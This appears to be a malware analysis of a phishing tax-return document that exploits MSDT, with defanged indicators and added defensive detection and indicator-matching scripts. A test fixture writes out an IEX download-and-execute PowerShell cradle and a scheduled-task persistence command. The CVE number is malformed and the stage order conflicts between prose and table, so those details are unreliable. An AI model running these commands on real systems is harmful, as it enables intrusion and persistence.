Initial Email
An email was discovered from comel[@]industry-mass[.]com. The sender's domain had been created within the last 15 days.
The email was titled "Tax return 2022" and contained a .docx attachment.
When opened, the file initially looks like an actual tax return. I have redacted the private information from the screenshot.
Behind the scenes, a macro runs that exploits the CVE-2022-301090 MSDT vulnerability.
Payload Stage 1: MSDT Vulnerability
The macro calls out to hxxps://files[.]catbox[.]moe/sndoli[.]hta, which contains an obfuscated script.
When chained with the CVE-2022-301090 vulnerability, this becomes PowerShell that uses IEX (Invoke-Expression) to fetch and run hxxps://powpowpowffs5[.]blogspot[.]com/atom.xml. That URL immediately 302-redirects to 529f38d0-3744-4286-b484-be860d475d25[.]usrfiles[.]com/ugd/529f38_05b9ed78f84140d6b73380af191cbd42.txt, which serves the stage 2 PowerShell.
Payload Stage 2: Main Powershell
The stage 2 script is obfuscated further. Its initial steps kill several Windows processes; it then saves the payload to C:\ProgramFiles\MEMEMAN\CypherDeptoggraphy.~+~ before decrypting it and creating a scheduled task for the file C:\ProgramData\MEMEMAN\UpdateEscan.js.
Execution
The final payload was downloaded and executed within PowerShell at around 2:17 PM on 22 March. The payload successfully copied itself to, and created additional files in, the MEMEMAN directory. It then cloned itself to the Windows Startup directory and created two scheduled tasks to maintain persistence.
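The three stages above (an Office application spawning msdt.exe, a PowerShell IEX download cradle pulling a blog-hosted atom.xml feed, and a scheduled task pointing at a .js file under ProgramData or the Startup folder) each leave a distinct process-creation footprint. The following detection logic is an added example and is not code from the original post; it assumes process-creation telemetry with parent image, image and command line fields (Sysmon Event ID 1 style), and the sample events it runs over are constructed, with only the UpdateEscan.js path taken from the analysis above.

```python
"""Detection rules for the execution chain described in this analysis.

Added example (not from the original post). Assumes process-creation
telemetry exposing parent image, image and command line. All sample
events below are constructed; they are not the incident's real telemetry.
"""
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

IEX_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
CRADLE_RE = re.compile(
    r"(downloadstring|downloadfile|net\.webclient|invoke-webrequest|"
    r"invoke-restmethod|\biwr\b|\birm\b)", re.I)
# Stage 1 and stage 2 both used blog-hosted atom.xml feeds as payload carriers.
ATOM_URL_RE = re.compile(r"https?://[^\s'\"]+/atom\.xml", re.I)
SCHTASK_RE = re.compile(r"(register-scheduledtask|schtasks(\.exe)?\s+/create)", re.I)
# .js task targets under ProgramData or the per-user Startup folder.
PERSIST_PATH_RE = re.compile(
    r"(\\programdata\\|\\start menu\\programs\\startup\\)[^\s\"']*\.js\b", re.I)


@dataclass
class ProcEvent:
    parent: str   # parent image file name
    image: str    # image file name
    cmdline: str  # full command line


def office_spawns_msdt(e: ProcEvent) -> bool:
    """Stage 1: an Office application launching the MSDT troubleshooter."""
    return e.parent.lower() in OFFICE_APPS and e.image.lower() == "msdt.exe"


def powershell_iex_cradle(e: ProcEvent) -> bool:
    """Stage 1 -> 2: PowerShell evaluating remote content with IEX."""
    if e.image.lower() not in POWERSHELL or not IEX_RE.search(e.cmdline):
        return False
    return bool(CRADLE_RE.search(e.cmdline) or ATOM_URL_RE.search(e.cmdline))


def js_scheduled_task(e: ProcEvent) -> bool:
    """Stage 2: scheduled task whose action is a .js file in a persistence path."""
    return bool(SCHTASK_RE.search(e.cmdline) and PERSIST_PATH_RE.search(e.cmdline))


RULES = {
    "office_spawns_msdt": office_spawns_msdt,
    "powershell_iex_cradle": powershell_iex_cradle,
    "js_scheduled_task": js_scheduled_task,
}


def detect(events):
    """Return (event_index, rule_name) pairs for every rule that fires."""
    return [(i, name) for i, e in enumerate(events)
            for name, rule in RULES.items() if rule(e)]


def chain_complete(hits) -> bool:
    """True when every stage of the chain was observed in the event set."""
    return {name for _, name in hits} == set(RULES)


def sample_events():
    """Constructed events covering the chain plus two benign look-alikes."""
    return [
        ProcEvent("explorer.exe", "WINWORD.EXE",
                  '"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
                  '"C:\\Users\\user\\Downloads\\Tax return 2022.docx"'),
        ProcEvent("WINWORD.EXE", "msdt.exe",
                  "C:\\Windows\\System32\\msdt.exe ms-msdt:/id PCWDiagnostic /skip force"),
        ProcEvent("msdt.exe", "powershell.exe",
                  'powershell.exe -w hidden -c "IEX (New-Object Net.WebClient)'
                  ".DownloadString('https://feed.example.invalid/atom.xml')\""),
        ProcEvent("powershell.exe", "powershell.exe",
                  'powershell.exe -c "Register-ScheduledTask -TaskName UpdateEscan '
                  "-Action (New-ScheduledTaskAction -Execute wscript.exe "
                  '-Argument C:\\ProgramData\\MEMEMAN\\UpdateEscan.js)"'),
        # Benign: legitimate task creation with a non-.js target.
        ProcEvent("svchost.exe", "schtasks.exe",
                  'schtasks.exe /create /tn "Office Update" '
                  '/tr "C:\\Program Files\\Microsoft Office\\update.exe"'),
        # Benign: ordinary PowerShell use.
        ProcEvent("explorer.exe", "powershell.exe", "powershell.exe -c Get-Process"),
    ]


if __name__ == "__main__":
    hits = detect(sample_events())
    for idx, name in hits:
        print(f"event {idx}: {name}")
    print("full chain observed:", chain_complete(hits))
```

Each rule is deliberately narrow (Office parent plus msdt.exe, IEX plus a download primitive, task creation plus a .js target in a persistence path) so that routine msdt, PowerShell and schtasks activity, like the two benign events in the sample, does not fire; correlating all three on one host is what makes the alert high-confidence.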
Indicators
Hashes
| SHA256 Hash | Description |
| --- | --- |
| 9e49747bcd7e4eea173a793a0a6c34f3533dc23cf6565d32e4de3a33ad3c8fed | SHA2 of initial .docx file |
| dac71c21f264036c2c0288340ad6889002a4ed8f4dee74da35b15f7a8a26b473 | SHA2 of the .hta file |
| a905e397a6bb3374a54fa8ebccf57ff3b8d0f2cd0aca4c9091b0b19fd85d67b3 | SHA2 of the master payload |
| 9c7aefd09d3939a04aa2e36e553881b3ffd88efe8fdda7121a80f37653606b0d | SHA2 of REALENGINEUPDATE.js, a persistence file spawned by the execution of the master payload |
| 6b4fb85973c337fd7cf1b272ab313557a2d256314ab599638fac3ba3d6e8ffb7 | SHA2 of UpdateEscan.js, a persistence file spawned by the execution of the master payload |
| e7831599adde64042091b5db47032e3a3c3b2f7b8720156900b38f35ca2d8936 | SHA2 of WindowsDEFENDERUPDATE.js, a persistence file spawned by the execution of the master payload |
| 9b57c468f4df5bbedb75d0027348a2dd278e4d168b83a6e74c777d6737de0606 | SHA2 of CypherDeptography.~_~, a persistence file spawned by the execution of the master payload |
URLs
| URL | Description |
| --- | --- |
| urlcallinghta6[.]blogspot[.]com/atom[.]xml | 1st URL request from .docx file |
| files[.]catbox[.]moe/sndoli[.]hta | 2nd URL that was the result of a 302 redirect from 1st URL. |
| powpowpowffs5[.]blogspot[.]com/atom[.]xml | 3rd URL that was contacted from the decoded powershell code in sndoli.hta |
| 529f38d0-3744-4286-b484-be860d475d25[.]usrfiles.com/ugd/529f38_05b9ed78f84140d6b73380af191cbd42[.]txt | 4th URL that was the result of a 302 redirect from 3rd URL |
| bakc2000[.]blogspot.com/atom[.]xml | URL used by one of the files for persistence, re |
| backuphotelall[.]blogspot.com/atom[.]xml | URL used by one of the files for persistence |
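The indicator tables above are defanged (`[.]`, `hxxp`), so they cannot be fed straight into a hash or proxy-log search. The script below is an added example (not from the original post) that parses pipe-delimited indicator tables in this format, refangs the values, and matches them against a file-hash inventory and proxy log lines. The two hash rows and four URL rows embedded in it are copied from the tables above; the file inventory and proxy log lines it is run over are constructed.

```python
"""Parse defanged indicator tables and match them against local artefacts.

Added example (not from the original post). The embedded indicator rows are
copied from the tables above; the file inventory and proxy log are constructed.
"""
import re

# Subset of the indicator tables above, in the page's own pipe format.
HASH_TABLE = """
| SHA256 Hash | Description |
| --- | --- |
| 9e49747bcd7e4eea173a793a0a6c34f3533dc23cf6565d32e4de3a33ad3c8fed | SHA2 of initial .docx file |
| dac71c21f264036c2c0288340ad6889002a4ed8f4dee74da35b15f7a8a26b473 | SHA2 of the .hta file |
"""

URL_TABLE = """
| URL | Description |
| --- | --- |
| urlcallinghta6[.]blogspot[.]com/atom[.]xml | 1st URL request from .docx file |
| files[.]catbox[.]moe/sndoli[.]hta | 2nd URL that was the result of a 302 redirect from 1st URL. |
| powpowpowffs5[.]blogspot[.]com/atom[.]xml | 3rd URL that was contacted from the decoded powershell code in sndoli.hta |
| 529f38d0-3744-4286-b484-be860d475d25[.]usrfiles.com/ugd/529f38_05b9ed78f84140d6b73380af191cbd42[.]txt | 4th URL that was the result of a 302 redirect from 3rd URL |
"""

DEFANG_RULES = [("[.]", "."), ("[:]", ":"), ("hxxps://", "https://"), ("hxxp://", "http://")]
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)


def refang(value: str) -> str:
    """Reverse the common defanging conventions used in threat reports."""
    for defanged, real in DEFANG_RULES:
        value = value.replace(defanged, real)
    return value


def parse_ioc_table(text: str):
    """Return (indicator, description) pairs from a pipe-delimited table.

    The first pipe row is treated as the column header and markdown
    separator rows (---) are skipped.
    """
    rows, header_seen = [], False
    for line in text.strip().splitlines():
        if "|" not in line:
            continue
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if not header_seen:
            header_seen = True
            continue
        if set(cells[0]) <= set("-: "):
            continue
        rows.append((refang(cells[0]), cells[1] if len(cells) > 1 else ""))
    return rows


def normalize_url(url: str) -> str:
    """Drop the scheme and trailing slash so table entries and log URLs compare equal."""
    url = re.sub(r"^[a-z][a-z0-9+.-]*://", "", url.strip(), flags=re.I)
    return url.rstrip("/").lower()


def match_hashes(observed: dict, hash_iocs):
    """observed maps file name -> SHA-256 hex; returns (file name, description) hits."""
    lookup = {digest.lower(): desc for digest, desc in hash_iocs}
    return [(name, lookup[digest.lower()])
            for name, digest in observed.items() if digest.lower() in lookup]


def match_urls(log_lines, url_iocs):
    """Returns (line number, url, description) for every log URL found in the IOC list."""
    lookup = {normalize_url(url): desc for url, desc in url_iocs}
    hits = []
    for n, line in enumerate(log_lines, 1):
        for url in URL_RE.findall(line):
            key = normalize_url(url)
            if key in lookup:
                hits.append((n, url, lookup[key]))
    return hits


def sample_files():
    """Constructed inventory: one page hash, one placeholder hash (all zeros)."""
    return {
        "Tax return 2022.docx": "9E49747BCD7E4EEA173A793A0A6C34F3533DC23CF6565D32E4DE3A33AD3C8FED",
        "notes.txt": "0" * 64,
    }


def sample_proxy_log():
    """Constructed proxy log lines; the first two reuse URLs from the table."""
    return [
        "10.0.0.5 GET https://powpowpowffs5.blogspot.com/atom.xml 302",
        "10.0.0.5 GET https://files.catbox.moe/sndoli.hta 200",
        "10.0.0.7 GET https://www.example.com/index.html 200",
    ]


if __name__ == "__main__":
    for name, desc in match_hashes(sample_files(), parse_ioc_table(HASH_TABLE)):
        print(f"hash match: {name} -> {desc}")
    for n, url, desc in match_urls(sample_proxy_log(), parse_ioc_table(URL_TABLE)):
        print(f"line {n}: {url} -> {desc}")
```

Hash comparison is case-insensitive and URL comparison ignores the scheme, because the tables above list URLs without one while proxy logs record the full request; both normalisations avoid missing a hit over a formatting difference.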